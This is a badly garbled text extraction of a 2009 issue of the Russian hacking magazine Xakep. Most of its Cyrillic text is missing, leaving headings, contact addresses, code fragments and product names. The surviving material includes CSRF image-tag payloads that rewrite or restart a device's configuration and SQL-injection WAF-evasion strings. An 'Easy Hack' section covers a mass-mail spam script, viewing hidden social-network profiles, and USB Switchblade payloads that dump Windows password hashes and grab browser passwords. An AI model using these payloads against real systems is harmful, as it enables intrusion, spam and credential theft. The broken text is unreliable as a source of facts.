Хакер 2009 03 PDF

: iPhone
. 56
x 03()2009
w w w.xakep.ru
03 (123) 2009
/ ARMY.MIL

ARMY.MIL . 48
123
WEP
. 64
. 30

WI-FI
WEP
USB-

LINUX
. 84
10
,
- . ,
.
,
party.xakep.ru.
,
Capture the flag, . , 2 .
nikitoz, . .
party.xakep.ru
, !
CONTENT03(123)
004 MEGANEWS

FERRUM
016 !

AMD
PC_ZONE
020 Google

gmail.com
026

030
USB-
034

038 Easy Hack

042

048 ARMY.MIL

052 CMS eZ Publish
CMS
056
Apple iPhone
064 WEP
,
weplab aircrack
068

072 -Tools

076 X-Profile:

080

Ubuntu 8.10
084

Linux
088

?
092 Python

096 - Symbian

Symbian? !
102

Pythone
106 Verilog

Verilog
112

116

SYN/ACK
120
PPTP- Windows Server 2008
126
MegaFAQ Windows Server 2008
130
Linux

134
Symon:
138 FAQ United

FAQ
141

143
8,5
144 WWW2
web-
052
064
102
130
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)
Dr. Klouniz
(alexander@real.xakep.ru)
Dlinyj
(dlinyj@real.xakep.ru)
>

(lyashchenko@gameland.ru)
/DVD
>
Step
(step@real.xakep.ru)
> Unix-
Ant
>

(komarov@gameland.ru)
>

/Art
>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
>

/xakep.ru
>

(xa@real.xakep.ru)
/ .: (495) 935-7034, : (495)

780-8824
> GAMES & DIGITAL
(goryacheva@
gameland.ru)
>

>

>
( )
(strekneva@
gameland.ru)
>

>

> -
(alekseeva@
gameland.ru)
/Publishing
>

(noah@gameland.ru)
>

>

(dmitri@gameland.ru)
>

(shostak@gameland.ru)
>

(romanovski@gameland.ru)
>

(stepanovm@gameland.ru)
>

(leonova@gameland.ru)
>

(ladyzhenskiy@gameland.ru)
>PR-

(litvinovskaya@gameland.ru)
>

(andrey@gameland.ru)
>

(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14 2002 .

Lietuvas Rivas, .
100 000 .
.

.
:

. ,

,
.

.

.
.

Gameland
, ,
Gameland TV. , content@
gameland.ru.
>> meganews
MIFRILL
/ MIFRILL@REAL.XAKEP.RU /
Nintendo

Nintendo DSi, ,
.
. , DSi
, , , . Nintendo
GameBoy Advance , ,
. ( - ,
), SD-, 3.25. , DSi
-. Nintendo DSi
Camera, Nintendo DSi Sound Nintendo DSi Shop ,
,
WiFi ( DSi ). 169.99
, 149 ,
.
Skype
Microsoft,
,
5%
20% .
, Skype Windows
. Skype, ,
, , . , .
, , ,
- 400 /, 30 ! , , , , 50% , .
, .
,
, -. nokia! Skype Nokia
. ,
N-, Skype-. Nokia N97.

, , Creative Live! Cam Video
IM Ultra. 1.3-
,
5.0 (
) -.
,

, USB
Plug & Chat (
004

).

, muveeNow 2.0 Live!
Central Premium.
, Smart Face
Tracking
, .

2250 .
X 03 /123/ 09
>> meganews
,
-
. ,
- . , , ,
. ,
, .
() -
. ,
. :
, , . , .
, , , . ,

, ,
-.
6% .
2008
. 22%

Downadup (
Kido Conficker), .
,
, ,
Conficker B++.
,
. , Conficker
: .
Microsoft. $250.000
, Conficker. , Microsoft , ,
Server service (, ,
),
. ,
Windows Update .
5.5 16.5 .
Linux
.
. .

. ,
Eco-Box, , , , , ,
.
Origo Industries,
Origo
. , , CO2
-,
.
, , ,
.
,
. ,
. , ,
,
.
006
X 03 /123/ 09
>> meganews

. Google.
-, , Google
Google Maps, .
, :
. , Google
. -, Google
,
. Google
Health . , , ,
, \. ,
, , , Google.
, , Google Maps Latitude (
Android Windows Mobile 5.0,

BlackBerry, iPhone, iPod Nokia Symbian).
Latitude ,
, .
, Google Maps, ,
. ,
, ,
, .
, ,
35.5% .
3 ,

,
, .
,
, .

( ), .
,
MS Word . ,
, , , ,
. ,
,
. , .

Sun
Tech Days, Sun Microsystems,
, .
4- -,
8 10 . , Sun
Tech Days 1500 , , .

, .
40 , ,
Sun Microsystems
OpenSolaris 2008.11, JavaFX, NetBeans 6.5, xVM Server, MySQL.
008
-,
JavaFX OpenSolaris. University Day (10
) ,
, , .
,
Sun Microsystems
.
, : , - Client Software Group,
, - Solaris Data,
Availability, Scalability HPC Sun Microsystems Inc.
, , ,
: http://developers.sun.ru/techdays2009.
X 03 /123/ 09
>> meganews
5
2.5
, , , ? , , , , HP
TouchSmart tx2z. , ,
, HP
. , TouchSmart tx2z .
12.1 1280800 ,
180, AMD Turion X2 2.1 , DDR2
RAM ( 8 , 3 ), ATI Radeon
HD 3200 250 . ,
DVD-. ,
, , ,
. , TouchSmart tx2z .
, $1.800-2.000,
HP $1000. , ,
, , , .

Microsoft, , .
Bill & Melinda Gates
Foundation. , ,
. , , TED,
,

? ,

. - Microsoft
, , , ,
. ,
.
, .
Mobile World Congress, ,

Sony Ericsson. Idou (
, ) ,
, .
12.1 , ,
! Sony Cyber-Shot, ,
.
3.5 360x640 , , GPS, FM-, mircoSD- Wi-Fi,
Bluetooth, USB.
Symbian Foundation, .
.
010
X 03 /123/ 09
>> meganews

, :

.
.
,
,
, .
, .
, , . ,
, ,
.
, 20 ,

.

( ,
). , .
10 . 5 . ,
.
83% .
Ion
,
Ion NVidia ,
.
, , Ion
, -
Intel Atom.
,
GeForce 9400.
Atom -
,
1080p,
Windows Vista Windows 7.
NVidia , $299.
,
Intel NVidia .

, CPU GPU.
, ,
, .
012
X 03 /123/ 09
>> meganews

!
Psion ,
. Psion , ,
(netbook), .
,
. ,
netBook netBook Pro. ,
Canadian Psion Teklogix ( Psion, ) . ,
Gizmodo. Psion
, .
Dell . Dell (USPTO)
Psion netbook.
, Psion
.
....
=
Facebook
. , ,
. , ,
, , . Facebook
150 . , , , .
, Facebook .
,
, , Facebook 10
120.000 .
, , ,
. Facebook

.

,
Apple, IT-.
, Apple 1987
,
. ,
,
Fusion-io. SSD-,
$10.000 $100.000. Fusion-io
,
, ,
. , !
014
X 03 /123/ 09
>> meganews

, .
-
The Pirate Bay (TPB). ,
,
,
$140.000. , ,
Warner Bros.,
MGM Pictures, Columbia Pictures, 20th Century Fox Sony BMG.
14
. vs Twitter .
, ,
, ,
,
. , ,
. - (
) : ,
. , . . , , , ,
,
. , ,
3-5 . TPB .
, -,
, .
90% -, ,

IBM,
. , ,
, . IBM, ,
, ,
. 10 IBM,
, , . .

, .
, , ,
... ,
. , , ,
( , . .) , .
, , .
, , , .
, , , .
X 03 /123/ 09
015
>> ferrum
!
AMD
,

Advanced Micro Devices.
AMD Phenom II
. , , , AM-2+ .
! AMD,
NVIDIA ( ,
/ ).

,
.
:
1. . ,
- ( , SATA ).
2. . , .
3. : , 3DMark06,
, -
016
WinRar (, ).
4. . FarCry.
5. ( , ) Everest
Ultimate 4.50 ( stress-test). ,
. - ,
(,
) .
, .
Futuremark
,
.
/. !
X 03 /123/ 09
>> ferrum
FAR CRY (FPS)

: AMD Phenom X4 9650
, : 2 (Corsair XMS2-8000 2x512 , OCZ PC2 8000 2x512
)
: RAID 0 Samsung 80 SATA II
: Sapphire ATI Radeon HD 4870
DVD-: LG GSA-H62N
: GMC R2 TOAST
: ThermalTake W0131RE 850W
: Microsoft Windows XP
MSI DKA790GX
Gigabyte MA790GP-DS4H
Foxconn A7DA-s
Biostar TA790GX A2+
Asrock A780FullHD
ASUS Crosshair II Formula
0
10
20
30
40
50
60
70
80
90
000
FPS


:
ST BUY
ST BUY
BEST BUY
BE
BE
: NVIDIA nForce 780a SLI

: AMD Phenom/Phenom X4/Phenom
X3/Athlon 64 X2/Athlon 64/Athlon/Athlon 64 X4/Sempron
: 8 , 4xDIMM DDR2, 667 1066
: 3xPCI-Express 16, 1xPCI-Express 1, 2xPCI 32-
: NVIDIA SLI 3-way
: 6xSATA II, 1xIDE, 1xFDD
: 1xPS/2. 6xUSB 2.0, 1xIEEE1394, 1xE-SATA,
2xGbE LAN, HDMI, , , D-SUB,
7.1- ( PCI-Express)
Asrock A780FullHD
:
: AMD 780G
: 16 , 4xDIMM DDR2 DIMM, 533 1066
: Hybrid CrossFireX,
ATI Radeon HD3300
: 2xPS/2. 6xUSB 2.0, GbE LAN, DVI, D-SUB,
5.1-
8300 .
ASUS,

.
( WinRar
1156 /).
ASUS CPU Level Up. . BIOS , .
( ),
.
: , . ,
PCI-Express 1.
, , .
X 03 /123/ 09
1800 .
1800 ,
!
. - mATX, .
, , : 4
1066 PCI-Express
x16 . SATA II.
AMD
AM2/AM2+ .
Realtek ALC662 ,

- - Creative X-Fi.
, (
2000 . ). ,
Radeon HD 4870 X2.
017
>> ferrum
WINRAR (/)
C ()
MSI DKA790GX
MSI DKA790GX
Foxconn A7DA-s
Foxconn A7DA-s
Biostar TA790GX A2+
Biostar TA790GX A2+
Asrock A780FullHD
Asrock A780FullHD

0
200
400
600
800
1000
1200
1400
000
32
34
36
38
40
42
44
000
Gigabyte
Biostar TA790GX A2+
Foxconn A7DA-S

: 16 , 4xDIMM DDR2 DIMM, 533 1066
ATI Radeon HD3300
: 2xPS/2. 4xUSB 2.0, 1xIEEE1394, 1xE-SATA,
GbE LAN, HDMI, DVI, D-SUB, 7.1- .
: AMD 790GX
: AMD Phenom/Athlon 64 FX/Athlon 64
X2/Athlon 64/Sempron
: 8 , 4xDIMM DDR2 DIMM, 533 1066
ATI Radeon HD3300
: 2xPS/2. 4xUSB 2.0, 1xIEEE1394a, GbE LAN,
HDMI, DVI, D-SUB, 7.1-
2900 .
4400 .
, . ,
Smart Fan. ,
.
, ,
,

.
Foxconn A7DA-S 790GX. -,

.
-, BIOS
. -,
( ).
FireWire ( ). eSATA-.
, ,
eSATA- . ,
PCI-Express x16,
-. ,
- .
USB 2.0 (
6). eSATA ,
. , ,
, , .
,
.
018
X 03 /123/ 09
>> ferrum
3DMARK 2006 (MARKS)
MSI DKA790GX
Foxconn A7DA-s
Biostar TA790GX A2+
Asrock A780FullHD
0 500 1000 1500 2000 2500 3000 3500 4000
000
, .
TORs
EDI
:
: AMD 790GX
: 16 , 4xDIMM DDR2 DIMM, 667 1066 ,
ATI Radeon HD3300
: 2xPS/2. 4xUSB 2.0, 1xIEEE1394a, GbE LAN,
HDMI, DVI, D-SUB, 7.1- ,
EDI
TO
s CHOICE
ICE
HO
MSI DKA790GX
:
5500 .
: AMD 790GX
: 8 , 4xDIMM DDR2 DIMM, 667 1066
ATI Radeon HD3300
: 1xPS/2. 6xUSB 2.0, 1xIEEE1394, GbE LAN,
HDMI, DVI, D-SUB, 7.1- , , 1xE-SATA
4900 .
, , . PCI Express 1 , .
, , ,
.
. ,
AMD.
. ? , -,
, .
- , ,
- .
,
. , , BIOS
,
. , ,
eSATA, .
, .
SATA II. ,
AMD 790GX, eSATA-
( , , eSATA
!).
.
, .
MSI DKA790GX,
. , -
AMD 790GX.
Asrock A780FullHD ,
. z
X 03 /123/ 09
019
>> pc_zone

/ STEP@GAMELAND. RU/
GOOGLE
GMAIL.COM
, . , , ,
. , - . !

. ,
- -
, Exchange . ! , ,
. Gmail,
, , .
,
, - .
GMAIL?
. -, .
, . .

, Gmail offline, ,
, .
- .
, 7 :).
, , . , -
: .
020
- , -
Gmail
,
( ).
300-400 -.
Gmail !

. (
labels) ,
. , , Outlook The Bat! . :
Gmail.
( ) 99% .
, Gmail .
, 3 ,
. Google
!
0:
Gmail : ,

, .
, , ,
X 03 /123/ 09
>> pc_zone
Gmail , addon
. ? Gmail , ,
? .
Gmail
. ,
English !
1:
, . ,
Gmail? ?
, . : step@real.xakep.ru stepan.ilyin@
gmail.com. Gmail ! :) ,
,
. , ,
, . ,
,
POP3.
, Outlook Bat. Settings
Accounts. Get mail
from other accounts , , ,
Add another mail account.
, : email,
/ POP3-. SSL-, ,
. , Gmail -
Inbox. :
(, IMAP
Exchange ), Gmail . ,
, 300
, .
.
. , Gmail.

,
. : Gmail
. ,
Accounts Add another email address you own
email.
( , , ) . , - .
X 03 /123/ 09
2: GMAIL GOOGLE
Google ,
. , ,
, :
from:<>
( )
subject:<>
label:<>
filename:< >
in:inbox/in:trash/in:spam
is:starred :)
is:unread/is:read
is:chat
, from:nikitoz label: is:unread

ftp ftp. ?
, ( -

Show search options).
3: GMAIL LABS
Google , .
, , ,
- Beta (,
,
),
. ,
Gmail Labs ( ). :
Offline Gmail ( 4);
Tasks (todolist) ;
Quick Links , ,
;
Signature tweaks ;
Navbar drag and drop
, ;
Custom Label Colors
(labels);
Multiple Inboxes Gmail;
021
>> pc_zone

Flacky Mode : , ,

,
. , ,
Spam Trash , Gmail
. .
, .
-, . ,
.

. , ,
Gmail labs.
Flacky
Connection,
. Gmail
, . ,

.
info

Google Gtalk,

XMPP
(Jabber).
Gmail

Jabber-
.
,

AOL,
,

.
,
:).
5: GMAIL
, , Gmail
Create a Document ;
Google Docs gadget
Google Docs.
4: GMAIL
,
,

. Gmail

.
Vombato Mail Drive
(www.vombato.com)

,

POP3.
022
! -,
-
, ! Gmail
, . ,
Google Gears, - ,
,
Gmail. Google,
.
, -, :). , , gmail.com , , ,
. ,
Gmail Labs,
, Offline
. :
, .
, Gmail
,
.

, Gmail
? ,
. Google Chrome (www.
google.com/chrome), Gmail . offline-
.
Mozilla Prism
(labs.mozilla.com/projects/prism),
, MacOS, Linux. ,
Mailplane (mailplaneapp.com),
Gmail.
6: GMAIL
,
.
- . , ,
Gmail ,
. ---! Send by
Gmail dragndrop . ,
gAttach, Affixa (www.affixa.com). ,
(Microsoft Office, Adobe
Acrobat ..)
.
mailto,
, ,
Gmail
X 03 /123/ 09
>> pc_zone
Gmail
Gmail Labs
Yahoo! Mail. , ( Build 1229) .
mailto ,
Opera Mail (M2), -
Gmail!
- , SSL- . ,
,
HTTP-
. , , .
:
https://www.google.com/accounts/ServiceLogin?...
HTTP, :
http://mail.google.com/mail
https, .
, -
, - (, VPN).
The Middler, Defcon16. ,
-,
Gmail. Google

(Always use https),
. .
The Middler . ,
, Ruby ( )
.
,
ARP- DNS/DHCP-. The
Middler :
user- , HTTP;
HTTPS HTTP;
-.
X 03 /123/ 09
. Preferences Advanced
Programs.
7:
, Gmail:
, ,
(
Gmail Drive). ,
. Google
: .
,
CookiePie (www.nektra.
com/oss/firefox/extensions/cookiepie) Firefox,

, , Gmail.
Firefox, Gmail Manager (https://addons.mozilla.org/en-US/firefox/
addon/1320), .
Gmail

-
.
, ,

(server-side e-mail filter). :
1. Gmail;
2. Gmail . ,
, Gmail ,
,
header.
3. ,
, Gmail. Inbox
(, Gmail ).
Gmail. :
Gmail ? :
X-Forwarded-For: user@gmail.com forwarded@to.com
X-Gmail-Received: some-random-number
Delivered-To: user@gmail.com
023
>> pc_zone
, .
,

,
, , .
8: GMAIL
- , Gmail 7
. , , ?
, ,
. ! :)
GMail Drive (www.viksoe.dk) .
,
. ,
.
? , ,
Gmail Drive Config (http://convivea.com).
, Python GmailFS (richard.jones.name),
Mac OS gDisk (gdisk.sourceforge.net).
,
Gmail.
Php Gmail Drive (pgd.sourceforge.net), PHP
Gmail libgmailer
(sourceforge.net/projects/gmail-lite).
9:
Gmail Labs
. , Greasmonkey
Firefox. :
, ! , Gmail ,
- .
, Better Gmail 2 Firefox (addons.mozilla.
org/en-US/firefox/addon/6076). ,
Greasmonkey, , !
:
;
;
, ;
;
;
..
10: GMAIL
Gmail ! FAQ. ,
024
, Gmail
. ,
Gmail Lite (gmail-lite.sourceforge.net). Gmail (
AJAX-). Google
HTML-
. Gmail Lite, , ,
- .
- PHP.
, .
www.tedsta.com/gmail/index.php,
:).
libgmailer.
11:
, Google,
100% , .
, ,
- .
, , . , Gmail
Gmail Backup (www.gmail-backup.com).
email, , , ,
IMAP EML
. Restore,
. ,
, . , , wxPython (http://wxpython.org). z
X 03 /123/ 09
>> pc_zone

/ ALEKS.RAIDEN@GMAIL.COM /
.
, , CNN
BBC . nipp
140 .
.
? , :
, .
: , , ,
. : + = .
140
-
, . , ,
( follow, ).
http://
twitter.com/_.
, ,
, follow-.
, , .
140 .
? ,
, SMS
, . ,
,
. ,
Linux ,
0-day . 140 :
SMS 160
. ( , API),
,
026
. , , , iPhone, Nokia
, Java-.
SMS-, ,
.
?
:
. ?. ,
. : , ? ,
, . : !
, ,
, . ... .
.
: , 16-00, !? .
friend- ,
. . ,
, , , .
. ,
-
X 03 /123/ 09
>> pc_zone
info

API,
,
. ,
WHOIS username
(
), GET
username ( ), FAV username
( ), INVITE phone
number (
,
).

(http://
twitter.zendesk.
com/forums/10711/
entries/14020).
, /
.
.
, , .
,
,
. Wordpress ,
. ,
140 ! ,
, !
? ,
- .
, (,
). ?
- !
TWITTER-

API.

: ,
,
.
X 03 /123/ 09
(apiwiki.twitter.com). , , ,
, :).

?

. ,
,
, .
.
, ! , ( ), ,
, , ,
. - .
, :
, .
http://www.rutwitter.com/r/?page=1 - . ,
Umputun (- ): 2486 .
027
>> pc_zone
dvd
DVD-

,

(
-?).
warning

,

,

,
.
, -

,
,
.
links
http://twitter.
pbwiki.com/Apps

- ,
.
028
Digsby Twitter-
API -. hello world!,

-.
.
,
. -
,
(
?).
AIR- twhirl, (twitter.
com/abrdev) .
. , , -
Twitter-
,
, .
,
.

,

.
- -
. @
.
,
-.
,
,
. -
,
!
X 03 /123/ 09
>> pc_zone
, ,
!
,
follow-
!
. , . ,
. , .
, -
: Twitter ?!.
:). z
(twitter.com/downloads) . PC, , iPhone/iTouch, Google

Desktop-, Mac-, Linux- ,
, . , ,
, .
( The Top 21 Twitter Applications,
www.techcrunch.com/2009/02/19/the-top-20-twitter-applications). 20
- .

. ,
, API. ! , ,
,
. , (http://
twittercounter.com),
- (http://twitter.com/widgets), (http://www.
tweetfind.com), (http://
twittercounter.com/pages/country?time_zone=Kyev)
, , ( , ).
X 03 /123/ 09
( :
http://twitter.com/jack) 2006 ,
.

, , .
-,
MTV Music Award, Apple WWDC 2007. , , , ,
.
, ,
, .
,
.
6 . , ,
50 . Facebook,
500 , .
, ,
.
,
, 0 .
Ruby on Rails MySQL. ,
memcached.
( - 600
!) 8 Sun.
8- 180 HTTP-
Monreal RoR. . ,
. ,
RoR ,
Twitter. , Java
++, , , .
029
>> pc_zone
STEP
/ STEP@GLC.RU /

USB-
: . ,
, ,
. : USB-. . .
- -
.
: ,
. ,

?
, . , ,
2 autorun.inf .
,
autorun.inf , ,
. ,
,
. Downadup,
, , ,
. , -,
, -, .
NTFS , 1
.
, , . ,
. , ,
(, , ). ,
FAT32, ,
NTFS, .
030
NTFS HP: HP USB Disk Storage Format Tool (

Google SP27213.exe).
NTFS.
, , , .

:
format f: /FS:NTFS
,
:
convert f: /FS:NTFS
, autorun.inf
, USB-. - .
?
( FILES), - // .
.
, .
, , ,
.
X 03 /123/ 09
>> pc_zone
HDD HP USB Disk

Storage Format Tool
info
, ,
.
, : ,
, . , ,
Autorun (
).
autorun.inf, FILES.
? , . ,
ACL-, . , ,
, , .
,
,
, .
NTFS
FAT32.
PSP MP3- NTFS. :
NTFS Read only Linux.
! NTFS
. FAT32,
, NTFS
, , ,
, , . ,
!
FAT32, 2
, c NTFS
.
FAT32 , ,
.
autorun.inf. -
AUTORUN.
INF, Read only Hidden.
.
, , . ,
. . AUTORUN.
INF. , ,
. ,
,
X 03 /123/ 09

NTFS,

.
:
.
,

NTFS,

.

,
:

.
FAT32 !
USB Disk Security (www.
zbshareware.com), AUTORUN.
INF zhengbo. (-, ,
, ). : . -
$50, .

FAT32/NTFS (http://www.xakep.
ru/magazine/xA/062/080/5.asp),

UNC-. ,
UNC
,
.
\\server\share\path,
server .

,
server ? .,
031
>> pc_zone
dvd
FAT32/
NTFS
.
warning

, , , .

-
,

.

. :
!
. , : \\?\C:\
folder\file.txt. ,
UNC-
. BAT-
:
mkdir "\\?\J:\AUTORUN.INF\LPT3"

LPT3, AUTORUN.INF
, ,
autorun.inf, !
. -,
UNC- /
: \\?\J:\AUTORUN.INF\LPT3.

: , AUTORUN.INF1. ,
, , . BAT-,
, , , :
, (
),
( , Downadup),
;
AUTORUN.INF COM1 ;
NTFS;
desktop.ini,
.
rd /s /q %~d0\recycled
rd /s /q %~d0\recycler
rd /s /q %~d0\System Volume Information"
del /f /q %~d0\autorun.*
mkdir "\\?\%~d0\autorun.inf\com1"
attrib +s +h %~d0\autorun.inf
del /f /q %~d0\desktop.ini
mkdir "\\?\%~d0\desktop.ini\com1"
attrib +s +h %~d0\desktop.ini
, ,
autorun.bat .

,
. ,
, , -,
, , -,
:
Autorun.inf
BAT-
.
. : ,
? !

. - .
,
, ?
, ACL-
. ,
cacls (Change Access Control
Lists)
Windows XP Home Edition.
ACL-
. ,
X: :
cacls X:\
:
X:\ :(OI)(CI)F
F ( Full)
,
(OI)(CI).
, .
:
cacls X:\ /E /R

(Read only):
cacls X:\ /G :R
.
:).
032
X 03 /123/ 09
>> pc_zone
.INI, ,
SYS HKEY_
LOCAL_MACHINE\Software.
4. ,
, *.*. HKEY_LOCAL_
MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
AutoplayHandlers\CancelAutopla y\Files
REG_SZ *.*.
5. MountPoints2, , USB-.
, ,
. .
MountPoints2,
, .
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Explorer\MountPoints2
, . ,
MountPoints2 .
,
. , ? :)

Windows, ,
. !
Windows ,
. , autorun.
inf :
[autorun]
open = calc.exe
shell\Open\Command=calc.exe
shell\Open\Default=1
shell\Explore\Command=calc.exe
shell\Autoplay\Command=calc.exe
, , ,
. ? ! , ,
, . , :
1. , CD. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic
es\Cdrom, AutoRun .
2. HKEY_LOCAL_MACHINE\SOFTWARE\
Microsoft\Windows\Curr entVersion\policies\Explorer.
NoDriveTypeAutoRun dword
ff .
HKEY_CURRENT_USER,
.
3. HKEY_
LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
IniFileMapping\Autorun.inf, (
REG_SZ) @SYS:DoesNotExist. Windows ,
autorun.inf , , Windows 95!
, .INI-
. , ,
autorun.inf, HKEY_LOCAL_MACHINE\
SOFTWARE\DoesNotExist (, ).
, autorun.inf , .
@
X 03 /123/ 09

. , , ,
. ,
.
1. AutoRunGuard (autorun.synthasite.com/AutoRunGuard.php).
,
, CD. ,
, .
AutoRunGuard autorun.inf,
, .
2. Flash Guard (www.davisr.com).
. , :
Autorun.inf
;
Autorun.inf;
Autorun.inf;
Autorun.*;
Autorun.inf .
3. USB Disk Security (www.zbshareware.com). ,
. , -.
Flash Disinfector. z

. ,
. Secure Digital (SD) - .
: ,
read only.
, (
,
).
033
>> pc_zone

/ KOMAROV@ITDEFENCE.RU /
, ,
. , , , . .
.
,
(IDS)
(IPS).
. , ,
, . , IDS Snort :
,
(, -).
. ,
SQL- 15 3 , 8 .
! ,
:
(Access Complexity);
(Exploitability);
;
(Report Confidence).
VSS (www.first.org/
cvss), . ? , -
034
,
. ( ) , .

, .
WEB-
X-Force (xforce.iss.net),
IBM, , .
WEB- -
50% . ,
, , Google?
, .
,
,
. ( ) , , - .

, Web Application Security LifeCycle Microsoft
SDL. , ,
, .
,
.
X 03 /123/ 09
>> pc_zone
info
XSS-! , IDS .
demo.php-ids.org. , :)
, , ,
WEB Application Firewall (WAF),
Deep Packet Inspection Firewalls (
). , , ,
,
WEB-.
OSI (
), HTTP. , HTTP/HTTPS/SOAP/XML-RPC
. ,
.
GreenSQL (www.greensql.net).
SQL ,
SQL-. WAF ,
-
. mod_security,
http- WEB-,
GreenSQL -, .
, Reverse-proxy, SQL-, ,
MySQL. , ,
.

: , ,
(1=1) ,
TRUE,
.. GreenSQL
X 03 /123/ 09
,
DELETE, UPDATE INSERT, , DROP
CREATE. , drag
and click, , !
, , WEB- . , GreenSQL
Linux/Unix-,
:

WAF

NSS Labs (nsslabs.
com/certification/
waf/nss-wafv10-testproc.pdf).

(SmartBits SMB
6000, Reflector 2500,
Avalanche 2500)

, ,

WEB-
.
,

.
#
wget http://www.greensql.net/public/releases/
Debian_Etch/i386/greensql-fw_0.9.2_i386.deb
dpkg -i greensql-fw_0.9.2_i386.deb
#
What is the name of the server used to store
GreenSQL configuration db (MySQL server)? <-localhost
What is the database name for the GreenSQL
configuration? <-- greendb
Would you like to set up the database and
tables automatically? <-- Yes
What is the username of the MySQL
administrator? <-- root
Enter the MySQL administrator password <-your_root_sql_password ( mysql
root-a)
Confirm this password <-- your_root_sql_
password ( mysql root-a)
What is the GreenSQL db username? <-- green
What is the GreenSQL user password? <--
035
>> pc_zone
GrSecurity .
extension. IIS Manager

greensqlpassword ( green )
links
WAF

owasp.org/index.
php/Web_Application_
Firewall.

,
, .

GreenSQL db username .
, . greensql-fw
3305 , MySQL
3306.
, 127.0.0.1 3305. :
$db_connect = mysql_connect('127.0.0.1:3305',
'mysql_user', 'mysql_password')

. front-enda greensql-console
:
curl "http://greensql.net/download/greensqlconsole-0.4.6.tar.gz" > greensql-console0.4.6.tar.gz
tar -zxvf greensql-console-0.4.6.tar.gz & cd
greensql-console
emacs config.php # ,
greensql-console -
templates_c :
chmod 777 templates_c.
:
.
PHP-IDS (php-ids.org).

Google Group. PHP-IDS
, XSS, RFI, LFI.

, svn.
php-ids.org/svn/trunk/lib/IDS/default_filter.xml.
, ,
. Snort/mod_
security. ,
GreenSQL.
036

WEB ,
. , Windows
. ,
Linux,
. Microsoft, .
Dynamic IP Restrictions Extension (Microsoft.com) .
2008 Microsoft ,
IT-, web-.

SQL (SQL Injection). , The Dynamic
IP Restrictions Extension .
SQL-, XSS-,
DDoS-.
(SYN-,
DNS- ),
IP-. IP-
HTTP- ,
. , ,

.
IIS7 IPv4 and Domain Restrictions,
Dynamic IP Restrictions Extension IPv6.
iis.net/
downloads/default.aspx?tabid=34&g=6&i=1825.
IIS Manager
.
Edit Dynamic Restrictions .
The Dynamic IP Restrictions Extension
,
HTTP- 403 404, . . ,
IP. ,
IP,
.

(Capture The Flag)
RST/GHC,
. X 03 /123/ 09
>> pc_zone

CSRF-:
<img src=https://host/ajax.html?hostname=hostname
&gateway=10.1.1.1&dns=10.1.1.1&smtp=10.1.1.1&max
_src_conn=100&max_src_conn_rate_num=100&max_src_
conn_rate_sec=10&blacklist_exp=3600&ftp_
server=c__FTP-&ftp_port=21&ftp_
login=user&ftp_passwd=password&ftp_remote_dir=/
&remote_support_on=on&action=configuration&do=save>
,
,
:
<img src=https://host/ajax.html?action=restart&do=
core>
IPS SQL-injection
. z
,
( , ,
).
,
. , -
.
.
Fspy (mytty.org/fspy). .
./fspy . , /.fspy R 1 D s,A O [,T,], , d,:,p,f, size: ,s, atime: ,A
/etc/ ,
/etc/.
:
, . ,
Profense Web Application Firewall (armorlogic.com/profense_overview.
html) CSRF - HTTP-. ,
: Defenses against all OWASP Top Ten
vulnerabilities ,
OWASP (www.owasp.org). ,
. , ,
FTP/SCP, syslog-. X 03 /123/ 09
WAF
, WAF,
. , WAF ,
, . ,
WAF
evasion-, .
, UNION SELECT, OR 1=1,
EXEC_XP , , . , OR
1=1, :
OR LALA=LALA ( );
OR LALA=NLALA ( N,
nvarchar SQL-.
,
);
OR LALA=LA+LA ( );
OR LALA in (LALA) ( ).
037
>>
Easy Hack}
R0ID SKVOZ
/ R0ID@MAIL.RU /
/ KOMAROV@ITDEFENCE.RU /
:

:

-, PHP-
mail() DirectMailer. - ,
Inbox. ,
, .
[INBOX]Golder, DirectMailer.
, :
( 200000 )

email-

:

:
,
www.vkontakte.ru. ,
, ,
:). ,
. ,
.
ID .
,
http://night.doomgate.ru/vkontakte.
.
.
1. vkontakte.ru ,
.
2. ID .
. _
id.
038

Outlook The Bat
Text/HTML

( [INBOX]Golder
, ,
, ):
1. .
2. , ( , , ).
3. /cgi-bin.
4. inbox.cgi 755, (log, upload, sys) 777.
5. config.txt. ( DVD).
6. config.txt .
3. http://night.doomgate.ru/vkontakte.
4. id
ID .
5. :
,

,
,
,
()
6.
www.vkontakte.ru ID .
, Vrazvedke. , .
X 03 /123/ 09
>>
. ,
, .
Online,
profile.php .
,
/, :).
. :
Vkontakte . , Firefox :
1. Firefox.
2. about:config,
.
3. filter network.http.redirection-limit.
4. , 0 (
).
5. (Ctrl+T), http://
vkontakte.ru/login.php .
6. , .
3
:
WINDOWS VISTA
:
, , ,
. - , - ,
:). , :
1.
2.
3.
4.
5.

/Start
, . XP,
,
.
, .
:).
,
:
7. - , , http://vkontakte.
ru/friend.php.
8. ( 20).
, . profile.php
.

5. Print Spooler/
. ,
.
6. Security Center/ , .
, . .
:).
, . /
defrag. ,
.
: , .
, , .
!
, HKEY_CURRENT_USER Control
PanelDesktop. MenuShowDelay
, 400 0. ,
:
!
. :).

1. Windows Defender
.
.
2. Computer Browser/ ,
,
. , .
3. Windows Update .

.
4. Windows Error Reporting Service/
/
. XP
-
:).
X 03 /123/ 09
039
>>
:

:
, , .
-
. (wget, curl,
fetch), .
1. , :
http://host.ru/dir1/dir2/dir3/file.tar.gz%00
wget: wget -O file.rar http://host.ru/dir1/dir2/dir3/
file.tar.gz%00
2. ,
, HTML-,
. : -
.
, -
BRED3.
BRED , notepad. !
: ,

(, IPOD)
:
, .
USB Switchblade (wiki.hak5.org/wiki/USB_Switchblade) .
Hak5 USB Switchblade, . ,

: Dump SAM (
Security Account Managera Windows), IE/Firefox Password Grabber (
),
VNC-, , . ,
.
( techniques):
1. Max Damage Technique. , : X:\Documents\logfiles ( X -)
.
2. Amish Technique. (hak5.
org/releases/2x02/switchblade/AMISH1.0-payload.rar)
. , , ,
